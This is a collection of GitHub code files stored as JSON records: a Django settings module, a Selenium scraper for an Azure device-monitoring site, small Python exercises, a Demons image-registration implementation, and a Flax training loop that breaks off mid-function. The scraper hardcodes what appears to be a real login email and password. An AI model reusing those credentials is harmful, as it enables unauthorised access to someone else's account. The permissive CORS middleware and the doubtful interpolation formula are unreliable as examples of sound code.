+{"seq_id":"38585716242","text":"\"\"\"\nDjango base settings for starting a project\n\"\"\"\n\n# -*- coding: utf-8 -*-\nimport os\nfrom django.core.urlresolvers import reverse_lazy\n# Normally you should not import ANYTHING from Django directly\n# into your settings, but ImproperlyConfigured is an exception.\nfrom django.core.exceptions import ImproperlyConfigured\n\nfrom unipath import Path\n# settings.py\nfrom os.path import join, dirname\nimport dotenv\n\ndef get_env_setting(setting):\n \"\"\" Get the environment setting or return exception \"\"\"\n try:\n return os.environ[setting]\n except KeyError:\n error_msg = \"Set the %s env variable\" % setting\n raise ImproperlyConfigured(error_msg)\n\n####### PATH CONFIGURATION ###########\nPROJECT_DIR = Path()\n\n\ndef rel(*x):\n return PROJECT_DIR.child(*x)\n\nos.sys.path.insert(0, rel('apps'))\n\nMEDIA_ROOT = os.environ.get('MEDIA_ROOT', rel('public', 'media'))\n\nMEDIA_URL = '/media/'\n\nIMAGE_ROOT = os.path.join(MEDIA_ROOT, 'images')\nIMAGE_URL = os.path.join(MEDIA_URL, 'images/')\n\nSTATIC_ROOT = os.environ.get('STATIC_ROOT', rel('public', 'static'))\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = ()\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n######################################\n\n########## ENVIRONMENT SETTINGS ######\ndotenv.read_dotenv()\n\nSECRET_KEY = get_env_setting('SECRET_KEY')\nALLOWED_HOSTS = get_env_setting('ALLOWED_HOSTS').split()\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = bool(os.environ.get('DEBUG', False))\n######################################\n\n# Application definition\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 
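# NOTE: ordering matters here; SessionMiddleware must come before middleware that reads request.session, such as AuthenticationMiddleware.\n 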
'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n # TODO think best place for this middleware\n 'common.middleware.CORSAllowAllMiddleware',\n)\n\nROOT_URLCONF = 'common.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'wsgi.application'\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.8/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nSITE_ID = 1\n\n################### PROJECT ##########################\n\n# celery\nBROKER_URL = 'redis://localhost'\nCELERY_RESULT_BACKEND = 'redis://localhost:6379/0'\nCELERYD_POOL_RESTARTS = True\n\nREST_FRAMEWORK = {\n # Use Django's standard `django.contrib.auth` permissions,\n # or allow read-only access for unauthenticated users.\n # 'DEFAULT_PERMISSION_CLASSES': [\n # 'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'\n # ]\n 'PAGE_SIZE': 10,\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.BasicAuthentication',\n 'rest_framework.authentication.SessionAuthentication',\n 'rest_framework.authentication.TokenAuthentication'\n )\n}\nREST_AUTH_SERIALIZERS = {\n 'TOKEN_SERIALIZER': 'common.serializers.CustomTokenSerializer',\n}\nREST_SESSION_LOGIN = False\nAUTH_USER_MODEL = 'auth.User'\nAUTHENTICATION_BACKENDS = (\n # Needed to login by username in Django admin, regardless of `allauth`\n 'django.contrib.auth.backends.ModelBackend',\n # `allauth` specific authentication methods, such as login by e-mail\n)\nLOGIN_URL = '/'\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_EMAIL_VERIFICATION = 'mandatory'\nACCOUNT_CONFIRM_EMAIL_ON_GET = True\nLOGIN_ON_EMAIL_CONFIRMATION = '/'\n\nACCOUNT_ADAPTER = 'common.adapter.CustomAccountAdapter'\nURL_FRONT = 'http://localhost:8080/#/'\n######################################################","repo_name":"xgalv00/wall-server","sub_path":"settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"10514506321","text":"from selenium import webdriver\nimport time\nimport os\nimport openpyxl\nfrom openpyxl import Workbook\n#options = webdriver.ChromeOptions()\n#options.add_argument(\"--incognito\")\ndriver = webdriver.Chrome(\"E:/chromedriver/chromedriver.exe\") #chrome_options=options\n#driver.maximize_window()\ndriver.get(\"https://devicemon.azurewebsites.net\")\ndriver.find_element_by_xpath(\"//*[@id='i0116']\").send_keys(\"test.ncadminuser@ha-efbops.com\")\ndriver.implicitly_wait(50)\ndriver.find_element_by_id(\"idSIButton9\").click()\n#driver.implicitly_wait(40)\ndriver.find_element_by_xpath(\"//*[@id='i0118']\").send_keys(\"Nathcorp!1\")\ntime.sleep(4)\ndriver.find_element_by_id(\"idSIButton9\").click()\ndriver.find_element_by_id(\"idSIButton9\").click()\n#driver.implicitly_wait(30)\ndriver.find_element_by_id(\"TableSearch\").send_keys(\"014269671953\")\ndriver.find_element_by_xpath(\"//a[@id='App']\").click()\ntime.sleep(2)\n\nrow_count = len(driver.find_elements_by_xpath(\"//*[@id='PidAppInfoDetails']/tr \"))\ncol_count = len(driver.find_elements_by_xpath(\"//*[@id='PidAppInfoDetails']/tr[1]/td\"))\n\nprint(row_count)\nprint(col_count)\nfirst_part = \"//*[@id='PidAppInfoDetails']/tr[ \"\nsecond_part = \"]/td[\"\nThird_part = \"]\"\nfor n in range(1,row_count+1):\n for m in range(1, col_count + 1):\n final_path = first_part+str(n)+second_part+str(m)+Third_part\n table_data= driver.find_element_by_xpath(final_path).text\n fname= 'applist.xlsx'\n if(os.path.exists(fname)):\n Workbook =openpyxl.load_workbook(fname)\n Worksheet = Workbook.get_sheet_by_name('Sheet')\n else:\n Workbook =Workbook()\n Worksheet =Workbook.active\n Worksheet.cell(row=n,column=m).value = table_data\n Workbook.save(fname)\n print(table_data,end =\" \")\n print(\"\")\n #\ndriver.find_element_by_xpath(\"//*[@id='PidAppInfoPopup']/div/div/div[3]/button\").click()\ndriver.find_element_by_xpath(\"//*[@id='014269671953']\").click()\n\n\n\ndriver.find_element_by_xpath(\"//*[@id='UserLoginInfoPopup']/div/div/div[3]/button\").click()\n\n'''\ndef app_list(url):\n thepage= urllib.request.urlopen(url) //*[@id=\"UserLoginInfoPopup\"]/div/div/div[3]/button\n soupdata =BeautifulSoup(thepage,\"csv\")\n return soupdata\nsoup= app_list(\"https://devicemon.azurewebsites.net\")\nfor record in soup.findAll('tr'):\n for data in record.findAll('td')\n //*[@id=\"PidAppInfoDetails\"]/tr[1] \n'''\n'''\nposts= driver.find_element_by_id(\"PidAppInfoDetails\")\nfor post in posts:\n print(post.text)\n'''\n'''driver.close()'''","repo_name":"Rajni26kumari/firstpython1","sub_path":"Test/Test1.1.py","file_name":"Test1.1.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"30878387501","text":"#In this program, we roll two fair dice and the results will determine the next step to take\nfrom random import randint\nfrom time import sleep\n\n#In this first section, all the needed functions will be declared\n#Play option: This function determines whether the user wants to play or not\ndef playOption():\n playOrNot = input(\"Do you want to roll the dice or exit the game? \\n Type Y/N to indicate your choice: \")\n playOrNot = playOrNot.capitalize()\n if playOrNot == \"N\":\n print(\"Goodbye. See you later\")\n exit()\n elif playOrNot == \"Y\":\n print(f\"Welcome {username}, your dice will now be rolled\") \n else: \n print(f\"{username}, The game will now exit because you put in an invalid command.\\nGoodbye!\")\n exit() \n\n#Roll dice: This function rolls the dice on behalf of the user\ndef rollDice():\n print(\"Rolling die...\")\n sleep(1)\n die_roll_one = randint(1,6)\n die_roll_two = randint(1,6)\n print(f\"You need double sixes to start the game\")\n if die_roll_one == die_roll_two == 6:\n print(f\"Amazing {username}, you rolled double sixes. \\nYou can start the game! \")\n exit()\n else:\n print(f\"You rolled {die_roll_one} and {die_roll_two}.\\nPlease try again\")\n\n#---------------Running the code-----------------------------------------------------\nusername = input(\"Please enter your name: \")\nusername = username.capitalize()\n\nplayOption()\n\n#Determine the outcome of the die throw\ncount = 10\nwhile count > 0:\n#Roll the die \n rollDice()\n count = count -1\nprint(f\"Uh oh! {username}, you have exhausted the number of times you can throw.\\nYou will now exit the game! 
\") \n\n\n\n","repo_name":"ugocuevas/mycodehub","sub_path":"rolldice2.py","file_name":"rolldice2.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"70975770705","text":"\r\nimport os\r\nos.system(\"cls\")\r\n\r\n\r\n\r\nnota1 = int(input(\"primera nota: \"))\r\nnota2 = int(input(\"segunda nota: \"))\r\nnota3 = int(input(\"tercera nota: \"))\r\n\r\nif nota3 > 10 and nota3 <=18 and nota1 < 21 and nota2 < 21: \r\n nota3_p = nota3 + 2\r\n print(f\"Nota 3 con puntos: {nota3_p: .2f}\")\r\n p = (nota1 + nota2 + nota3_p) / 3\r\n print(f\"PROMEDIO: {p: .2f}\")\r\nelif nota1 > 20 or nota2 > 20 or nota3 > 20: \r\n print(f\"NOTA INCORRECTA \")\r\nelse: \r\n p = (nota1 + nota2 + nota3) / 3\r\n print(f\"PROMEDIO: {p: .2f}\")\r\n","repo_name":"AnderC23/Ejercicios-de-Python---Didacticas","sub_path":"E-Condicionales/Ejercicio_04.py","file_name":"Ejercicio_04.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40278490135","text":"###################################################\n# this file is to implement the Demons arithmetic #\n###################################################\nimport math\n\nimport numpy as np\nimport cv2\n\n\ndef transform(img: np.ndarray, t_x, t_y):\n shape = img.shape\n assert len(shape) >= 2\n if len(shape) == 2:\n np.expand_dims(img, axis=2)\n\n H, W, C = shape\n assert C == 1\n H, W, C = shape\n t_img = np.zeros_like(img)\n grid_x, grid_y = np.meshgrid(range(W), range(H))\n\n t_idx_x = np.clip(np.squeeze(t_x) + grid_x, 0, W - 1)\n t_idx_y = np.clip(np.squeeze(t_y) + grid_y, 0, H - 1)\n\n for i in range(W):\n for j in range(H):\n x, y = t_idx_x[j, i], t_idx_y[j, i]\n l_x = int(math.floor(x))\n r_x = min(l_x + 1, W - 1)\n t_y = int(math.floor(y))\n b_y = min(t_y + 1, H - 1)\n i0, i1, i2, i3 = img[t_y, l_x], img[t_y, r_x], img[b_y, l_x], img[b_y, r_x]\n t_img[j, i, ] = linear_interpolate(i0, i1, i2, i3, x - l_x, y - t_y)\n\n return t_img\n\n\ndef linear_interpolate(i0, i1, i2, i3, dx, dy):\n return i0 * dx * (1 - dy) + i1 * dx * dy + i2 * (1 - dx)*(1 - dy) + i3 * (1 - dx) * dy\n\n\ndef demons(moving_image: np.ndarray, fixed_image: np.ndarray):\n\n m_shape = moving_image.shape\n f_shape = fixed_image.shape\n assert m_shape == f_shape\n\n if len(m_shape) < 3:\n moving_image = np.expand_dims(moving_image, -1)\n fixed_image = np.expand_dims(fixed_image, -1)\n\n t_x = np.zeros(moving_image.shape, dtype='float')\n t_y = np.zeros(moving_image.shape, dtype='float')\n org_image = moving_image.copy()\n for i in range(200):\n if (i % 5) == 0:\n cv2.imwrite(r'D:\\Projects\\Python\\DL\\ClockInDemo\\data\\res_' + str(i) + '.jpg', moving_image)\n # cv2.imwrite(r'D:\\Projects\\Python\\DL\\ClockInDemo\\data\\res_fixed_' + str(i) + '.jpg', fixed_image)\n diff = -np.squeeze(moving_image - fixed_image)\n [d_m_y, d_m_x] = np.gradient(np.squeeze(moving_image))\n\n d2 = d_m_x**2 + d_m_y**2\n\n u_x = -(diff * d_m_x) / (d2 + diff**2)\n u_y = -(diff * d_m_y) / (d2 + diff**2)\n\n u_x[np.isnan(u_x)] = 0\n u_y[np.isnan(u_y)] = 0\n u_x[np.isinf(u_x)] = 0\n u_y[np.isinf(u_y)] = 0\n\n u_x_s = gaussian_filter(u_x, 3)\n u_y_s = gaussian_filter(u_y, 3)\n\n u_x_s /= np.max(u_x_s) * 2\n u_y_s /= np.max(u_y_s) * 2\n\n t_x = t_x + u_x_s\n t_y = t_y + u_y_s\n\n # t_x = gaussian_filter(t_x, 3, 1)\n # t_y = gaussian_filter(t_y, 3, 1)\n\n moving_image = transform(org_image, t_x, t_y)\n return moving_image\n\n\ndef 
gaussian_filter(img: np.ndarray, K_size=3, sigma=1.3):\n if len(img.shape) == 3:\n H, W, C = img.shape\n else:\n img = np.expand_dims(img, axis=-1)\n H, W, C = img.shape\n ## Zero padding\n\n pad = K_size // 2\n out = np.zeros((H + pad * 2, W + pad * 2, C), dtype=np.float)\n out[pad: pad + H, pad: pad + W] = img.copy().astype(np.float)\n\n ## prepare Kernel\n K = np.zeros((K_size, K_size), dtype=np.float)\n for x in range(-pad, -pad + K_size):\n for y in range(-pad, -pad + K_size):\n K[y + pad, x + pad] = np.exp(-(x ** 2 + y ** 2) / (2 * (sigma ** 2)))\n\n K /= (2 * np.pi * sigma * sigma)\n K /= K.sum()\n tmp = out.copy()\n\n # filtering\n for y in range(H):\n for x in range(W):\n for c in range(C):\n out[pad + y, pad + x, c] = np.sum(K * tmp[y: y + K_size, x: x + K_size, c])\n\n out = np.clip(out, 0, 255)\n out = out[pad: pad + H, pad: pad + W, ...]\n\n return out\n\n\nif __name__ == \"__main__\":\n m_img = cv2.imread(r'D:\\Projects\\Python\\DL\\ClockInDemo\\data\\test_1.jpg')\n\n m_img_gray = cv2.cvtColor(m_img, cv2.COLOR_RGB2GRAY)\n f_img = cv2.imread(r'D:\\Projects\\Python\\DL\\ClockInDemo\\data\\test_2.jpg')\n f_img_gray = cv2.cvtColor(f_img, cv2.COLOR_RGB2GRAY)\n # cv2.imshow(\"image\", f_img_gray)\n # cv2.waitKey(0)\n\n img = demons(m_img_gray, f_img_gray)\n\n cv2.namedWindow(\"image\")\n cv2.imshow(\"image\", img)\n cv2.waitKey(0)\n","repo_name":"LuZWCHA/MyLibs","sub_path":"nowandfuture/utils_medical/demons.py","file_name":"demons.py","file_ext":"py","file_size_in_byte":4096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31038154673","text":"import functools\nimport math\nimport os\nimport time\nfrom typing import Callable, Dict, Tuple\n\nfrom absl import flags\nfrom absl import logging\n\nimport flax\nfrom flax import jax_utils\nfrom flax import optim\nfrom flax.metrics import tensorboard\nfrom flax.training import checkpoints\nfrom flax.training import common_utils\nfrom flax.training import lr_schedule\nimport jax\nimport jax.numpy as jnp\n\nimport tensorflow as tf\nfrom tensorflow.io import gfile\n\n\nFLAGS = flags.FLAGS\n\n\n# Training hyper-parameters\nflags.DEFINE_float('gradient_clipping', 5.0, 'Gradient clipping.')\nflags.DEFINE_float('learning_rate', 0.1, 'Initial learning rate.')\nflags.DEFINE_bool('use_learning_rate_schedule', True,\n 'Whether to use a cosine schedule or keep the learning rate '\n 'constant. Training on cifar should always use the schedule '\n ', this flag is mostly for testing purpose.')\nflags.DEFINE_float('weight_decay', 0.001, 'Weight decay coefficient.')\nflags.DEFINE_integer('run_seed', 0,\n 'Seed to use to generate pseudo random number during '\n 'training (for dropout for instance). Has no influence on '\n 'the dataset shuffling.')\n\n# Additional flags that don't affect the model.\nflags.DEFINE_integer('save_progress_seconds', 3600, 'Save progress every...s')\nflags.DEFINE_multi_integer(\n 'additional_checkpoints_at_epochs', [],\n 'Additional epochs when we should save the model for later analysis. 
'\n 'No matter the value of this flag, the most recent version of the model '\n 'will be saved regularly to resume training if needed.')\nflags.DEFINE_bool('also_eval_on_training_set', False,\n 'If set to true, the model will also be evaluated on the '\n '(non-augmented) training set at the end of each epoch.')\n\n\ndef restore_checkpoint(\n optimizer,\n model_state,\n directory):\n \"\"\"Restores a model and its state from a given checkpoint.\n If several checkpoints are saved in the checkpoint directory, the latest one\n will be loaded (based on the `epoch`).\n Args:\n optimizer: The optimizer containing the model that we are training.\n model_state: Current state associated with the model.\n directory: Directory where the checkpoints should be saved.\n Returns:\n The restored optimizer and model state, along with the number of epochs the\n model was trained for.\n \"\"\"\n train_state = dict(optimizer=optimizer, model_state=model_state, epoch=0)\n restored_state = checkpoints.restore_checkpoint(directory, train_state)\n return (restored_state['optimizer'],\n restored_state['model_state'],\n restored_state['epoch'])\n\n\ndef save_checkpoint(optimizer,\n model_state,\n directory,\n epoch):\n \"\"\"Saves a model and its state.\n Removes a checkpoint if it already exists for a given epoch.\n Args:\n optimizer: The optimizer containing the model that we are training.\n model_state: Current state associated with the model.\n directory: Directory where the checkpoints should be saved.\n epoch: Number of epochs the model has been trained for.\n \"\"\"\n train_state = dict(optimizer=optimizer,\n model_state=model_state,\n epoch=epoch)\n if gfile.exists(os.path.join(directory, 'checkpoint_' + str(epoch))):\n gfile.remove(os.path.join(directory, 'checkpoint_' + str(epoch)))\n checkpoints.save_checkpoint(directory, train_state, epoch, keep=2)\n\n\ndef create_optimizer(model,\n learning_rate,\n beta = 0.9):\n \"\"\"Creates an SGD (Nesterov momentum) optimizer.\n Learning rate will be ignored when using a learning rate schedule.\n Args:\n model: The FLAX model to optimize.\n learning_rate: Learning rate for the gradient descent.\n beta: Momentum parameter.\n Returns:\n A SGD optimizer that targets the model.\n \"\"\"\n optimizer_def = optim.Momentum(learning_rate=learning_rate,\n beta=beta,\n nesterov=True)\n optimizer = optimizer_def.create(model)\n return optimizer\n\n\ndef cross_entropy_loss(logits,\n one_hot_labels):\n \"\"\"Returns the cross entropy loss between some logits and some labels.\n Args:\n logits: Output of the model.\n one_hot_labels: One-hot encoded labels. Dimensions should match the logits.\n Returns:\n The cross entropy, averaged over the first dimension (samples).\n \"\"\"\n log_softmax_logits = jax.nn.log_softmax(logits)\n return -jnp.sum(one_hot_labels * log_softmax_logits) / one_hot_labels.shape[0]\n\n\ndef error_rate_metric(logits,\n one_hot_labels):\n \"\"\"Returns the error rate between some predictions and some labels.\n Args:\n logits: Output of the model.\n one_hot_labels: One-hot encoded labels. 
Dimensions should match the logits.\n Returns:\n The error rate (1 - accuracy), averaged over the first dimension (samples).\n \"\"\"\n return jnp.mean(jnp.argmax(logits, -1) != jnp.argmax(one_hot_labels, -1))\n\n\ndef tensorflow_to_numpy(xs):\n \"\"\"Converts a tree of tensorflow tensors to numpy arrays.\n Args:\n xs: A pytree (such as nested tuples, lists, and dicts) where the leaves are\n tensorflow tensors.\n Returns:\n A pytree with the same structure as xs, where the leaves have been converted\n to jax numpy ndarrays.\n \"\"\"\n # Use _numpy() for zero-copy conversion between TF and NumPy.\n return jax.tree_map(lambda x: x._numpy(), xs) # pylint: disable=protected-access\n\n\ndef shard_batch(xs):\n \"\"\"Shards a batch across all available replicas.\n Assumes that the number of samples (first dimension of xs) is divisible by the\n number of available replicas.\n Args:\n xs: A pytree (such as nested tuples, lists, and dicts) where the leaves are\n numpy ndarrays.\n Returns:\n A pytree with the same structure as xs, where the leaves where added a\n leading dimension representing the replica the tensor is on.\n \"\"\"\n local_device_count = jax.local_device_count()\n def _prepare(x):\n return x.reshape((local_device_count, -1) + x.shape[1:])\n return jax.tree_map(_prepare, xs)\n\n\ndef load_and_shard_tf_batch(xs):\n \"\"\"Converts to numpy arrays and distribute a tensorflow batch.\n Args:\n xs: A pytree (such as nested tuples, lists, and dicts) where the leaves are\n tensorflow tensors.\n Returns:\n A pytree of numpy ndarrays with the same structure as xs, where the leaves\n where added a leading dimension representing the replica the tensor is on.\n \"\"\"\n return shard_batch(tensorflow_to_numpy(xs))\n\n\ndef get_cosine_schedule(num_epochs, learning_rate,\n num_training_obs,\n batch_size):\n \"\"\"Returns a cosine learning rate schedule, without warm up.\n Args:\n num_epochs: Number of epochs the model will be trained for.\n learning_rate: Initial learning rate.\n num_training_obs: Number of training observations.\n batch_size: Total batch size (number of samples seen per gradient step).\n Returns:\n A function that takes as input the current step and returns the learning\n rate to use.\n \"\"\"\n steps_per_epoch = int(math.floor(num_training_obs / batch_size))\n learning_rate_fn = lr_schedule.create_cosine_learning_rate_schedule(\n learning_rate, steps_per_epoch, num_epochs)\n return learning_rate_fn\n\n\ndef global_norm(updates):\n \"\"\"Returns the l2 norm of the input.\n Args:\n updates: A pytree of ndarrays representing the gradient.\n \"\"\"\n return jnp.sqrt(\n sum([jnp.sum(jnp.square(x)) for x in jax.tree_leaves(updates)]))\n\n\ndef clip_by_global_norm(updates):\n \"\"\"Clips the gradient by global norm.\n Will have no effect if FLAGS.gradient_clipping is set to zero (no clipping).\n Args:\n updates: A pytree of numpy ndarray representing the gradient.\n Returns:\n The gradient clipped by global norm.\n \"\"\"\n if FLAGS.gradient_clipping > 0:\n g_norm = global_norm(updates)\n trigger = g_norm < FLAGS.gradient_clipping\n updates = jax.tree_multimap(\n lambda t: jnp.where(trigger, t, (t / g_norm) * FLAGS.gradient_clipping),\n updates)\n return updates\n\n\ndef train_step(\n optimizer,\n state,\n batch,\n prng_key,\n learning_rate_fn,\n l2_reg\n):\n \"\"\"Performs one gradient step.\n Args:\n optimizer: The optimizer targeting the model to train.\n state: Current state associated with the model (contains the batch norm MA).\n batch: Batch on which the gradient should be 
computed. Must have an `image`\n and `label` key.\n prng_key: A PRNG key to use for stochasticity for this gradient step (e.g.\n for sampling an eventual dropout mask).\n learning_rate_fn: Function that takes the current step as input and return\n the learning rate to use.\n l2_reg: Weight decay parameter. The total weight decay penaly added to the\n loss is equal to 0.5 * l2_reg * sum_i ||w_i||_2^2 where the sum is over\n all trainable parameters of the model (bias and batch norm parameters\n included).\n Returns:\n The updated optimizer (that includes the model), the updated state and\n a dictionary containing the training loss and error rate on the batch.\n \"\"\"\n\n def forward_and_loss(model):\n \"\"\"Returns the model's loss, updated state and predictions.\n Args:\n model: The model that we are training.\n \"\"\"\n with flax.nn.stateful(state) as new_state:\n with flax.nn.stochastic(prng_key):\n logits = model(batch['image'], train=True)\n loss = cross_entropy_loss(logits, batch['label'])\n # We apply weight decay to all parameters, including bias and batch norm\n # parameters.\n weight_penalty_params = jax.tree_leaves(model.params)\n weight_l2 = sum([jnp.sum(x ** 2) for x in weight_penalty_params])\n weight_penalty = l2_reg * 0.5 * weight_l2\n loss = loss + weight_penalty\n return loss, (new_state, logits)\n\n step = optimizer.state.step\n lr = learning_rate_fn(step)\n grad_fn = jax.value_and_grad(forward_and_loss, has_aux=True)\n (_, (new_state, logits)), grad = grad_fn(optimizer.target)\n\n # We synchronize the gradients across replicas by averaging them.\n grad = jax.lax.pmean(grad, 'batch')\n\n # Gradient is clipped after being synchronized.\n grad = clip_by_global_norm(grad)\n new_optimizer = optimizer.apply_gradient(grad, learning_rate=lr)\n\n # Compute some metrics to monitor the training.\n metrics = {'train_error_rate': error_rate_metric(logits, batch['label']),\n 'train_loss': cross_entropy_loss(logits, batch['label'])}\n\n return new_optimizer, new_state, metrics, lr\n\n\n# Shorthand notation for typing the function defined above.\n# We omit the weight decay and learning rate arguments as they will be\n# passed before we pmap the function.\n_TrainStep = Callable[[\n flax.nn.Model, # model.\n flax.nn.Collection, # state.\n Dict[str, jnp.ndarray], # batch.\n jnp.ndarray # PRNG key\n], Tuple[flax.optim.Optimizer, flax.nn.Collection, Dict[str, float], # metrics.\n jnp.ndarray # learning rate.\n ]]\n\n\ndef eval_step(model, state,\n batch):\n \"\"\"Evaluates the model on a single batch.\n Args:\n model: The model to evaluate.\n state: Current state associated with the model (contains the batch norm MA).\n batch: Batch on which the model should be evaluated. Must have an `image`\n and `label` key.\n Returns:\n A dictionary containing the loss and error rate on the batch. These metrics\n are summed over the samples (and not averaged).\n \"\"\"\n\n # Averages the batch norm moving averages.\n state = jax.lax.pmean(state, 'batch')\n with flax.nn.stateful(state, mutable=False):\n logits = model(batch['image'], train=False)\n\n # Because we don't have a guarantee that all batches contains the same number\n # of samples, we can't average the metrics per batch and then average the\n # resulting values. To compute the metrics correctly, we sum them (error rate\n # and cross entropy returns means, thus we multiply by the number of samples),\n # and finally sum across replicas. 
These sums will be divided by the total\n # number of samples outside of this function.\n num_samples = batch['image'].shape[0]\n metrics = {\n 'error_rate':\n error_rate_metric(logits, batch['label']) * num_samples,\n 'loss':\n cross_entropy_loss(logits, batch['label']) * num_samples\n }\n metrics = jax.lax.psum(metrics, 'batch')\n return metrics\n\n\n# Shorthand notation for typing the function defined above.\n_EvalStep = Callable[\n [flax.nn.Model, flax.nn.Collection, Dict[str, jnp.ndarray]],\n Dict[str, float]]\n\n\ndef eval_on_dataset(\n model, state, dataset,\n pmapped_eval_step):\n \"\"\"Evaluates the model on the whole dataset.\n Args:\n model: The model to evaluate.\n state: Current state associated with the model (contains the batch norm MA).\n dataset: Dataset on which the model should be evaluated. Should already\n being batched.\n pmapped_eval_step: A pmapped version of the `eval_step` function (see its\n documentation for more details).\n Returns:\n A dictionary containing the loss and error rate on the batch. These metrics\n are averaged over the samples.\n \"\"\"\n eval_metrics = []\n total_num_samples = 0\n for eval_batch in dataset:\n # Load and shard the TF batch.\n eval_batch = load_and_shard_tf_batch(eval_batch)\n # Compute metrics and sum over all observations in the batch.\n metrics = pmapped_eval_step(model, state, eval_batch)\n eval_metrics.append(metrics)\n # Number of samples seen in num_replicas * per_replica_batch_size.\n total_num_samples += (\n eval_batch['label'].shape[0] * eval_batch['label'].shape[1])\n # Metrics are all the same across all replicas (since we applied psum in the\n # eval_step). The next line will fetch the metrics on one of them.\n eval_metrics = common_utils.get_metrics(eval_metrics)\n # Finally, we divide by the number of samples to get the mean error rate and\n # cross entropy.\n eval_summary = jax.tree_map(lambda x: x.sum() / total_num_samples,\n eval_metrics)\n return eval_summary\n\n\ndef train_for_one_epoch(\n dataset_source,\n optimizer, state,\n prng_key, pmapped_train_step,\n summary_writer\n):\n \"\"\"Trains the model for one epoch.\n Args:\n dataset_source: Container for the training dataset.\n optimizer: The optimizer targeting the model to train.\n state: Current state associated with the model (contains the batch norm MA).\n prng_key: A PRNG key to use for stochasticity (e.g. for sampling an eventual\n dropout mask). 
Is not used for shuffling the dataset.\n pmapped_train_step: A pmapped version of the `train_step` function (see its\n documentation for more details).\n summary_writer: A Tensorboard SummaryWriter to use to log metrics.\n Returns:\n The updated optimizer (with the associated updated model), state and PRNG\n key.\n \"\"\"\n train_metrics = []\n for batch in dataset_source.get_train(use_augmentations=True):\n # Generate a PRNG key that will be rolled into the batch.\n step_key, prng_key = jax.random.split(prng_key)\n # Load and shard the TF batch.\n batch = tensorflow_to_numpy(batch)\n batch = shard_batch(batch)\n # Shard the step PRNG key.\n sharded_keys = common_utils.shard_prng_key(step_key)\n\n optimizer, state, metrics, lr = pmapped_train_step(\n optimizer, state, batch, sharded_keys)\n train_metrics.append(metrics)\n train_metrics = common_utils.get_metrics(train_metrics)\n # Get training epoch summary for logging.\n train_summary = jax.tree_map(lambda x: x.mean(), train_metrics)\n train_summary['learning_rate'] = lr[0]\n current_step = int(optimizer.state.step[0])\n for metric_name, metric_value in train_summary.items():\n summary_writer.scalar(metric_name, metric_value, current_step)\n summary_writer.flush()\n return optimizer, state, prng_key\n\n\ndef train(optimizer,\n state,\n dataset_source,\n training_dir, num_epochs):\n \"\"\"Trains the model.\n Args:\n optimizer: The optimizer targeting the model to train.\n state: Current state associated with the model (contains the batch norm MA).\n dataset_source: Container for the training dataset.\n training_dir: Parent directory where the tensorboard logs and model\n checkpoints should be saved.\n num_epochs: Number of epochs for which we want to train the model.\n \"\"\"\n checkpoint_dir = os.path.join(training_dir, 'checkpoints')\n summary_writer = tensorboard.SummaryWriter(training_dir)\n prng_key = jax.random.PRNGKey(FLAGS.run_seed)\n\n optimizer = jax_utils.replicate(optimizer)\n state = jax_utils.replicate(state)\n\n if FLAGS.use_learning_rate_schedule:\n learning_rate_fn = get_cosine_schedule(num_epochs, FLAGS.learning_rate,\n dataset_source.num_training_obs,\n dataset_source.batch_size)\n else:\n learning_rate_fn = lambda step: FLAGS.learning_rate\n\n # pmap the training and evaluation functions.\n pmapped_train_step = jax.pmap(\n functools.partial(\n train_step,\n learning_rate_fn=learning_rate_fn,\n l2_reg=FLAGS.weight_decay),\n axis_name='batch')\n pmapped_eval_step = jax.pmap(eval_step, axis_name='batch')\n\n # Log initial results:\n if gfile.exists(checkpoint_dir):\n optimizer, state, epoch_last_checkpoint = restore_checkpoint(\n optimizer, state, checkpoint_dir)\n # If last checkpoint was saved at the end of epoch n, then the first\n # training epochs to do when we resume training is n+1.\n initial_epoch = epoch_last_checkpoint + 1\n info = 'Resuming training from epoch {}'.format(initial_epoch)\n logging.info(info)\n else:\n initial_epoch = 0\n logging.info('Starting training from scratch.')\n\n time_at_last_checkpoint = time.time()\n for epochs_id in range(initial_epoch, num_epochs):\n if epochs_id in FLAGS.additional_checkpoints_at_epochs:\n # To save additional checkpoints that will not be erase by later version,\n # we save them in a new directory.\n c_path = os.path.join(checkpoint_dir, 'additional_ckpt_' + str(epochs_id))\n save_checkpoint(optimizer, state, c_path, epochs_id)\n tick = time.time()\n optimizer, state, prng_key = train_for_one_epoch(dataset_source, optimizer,\n state, prng_key,\n pmapped_train_step,\n 
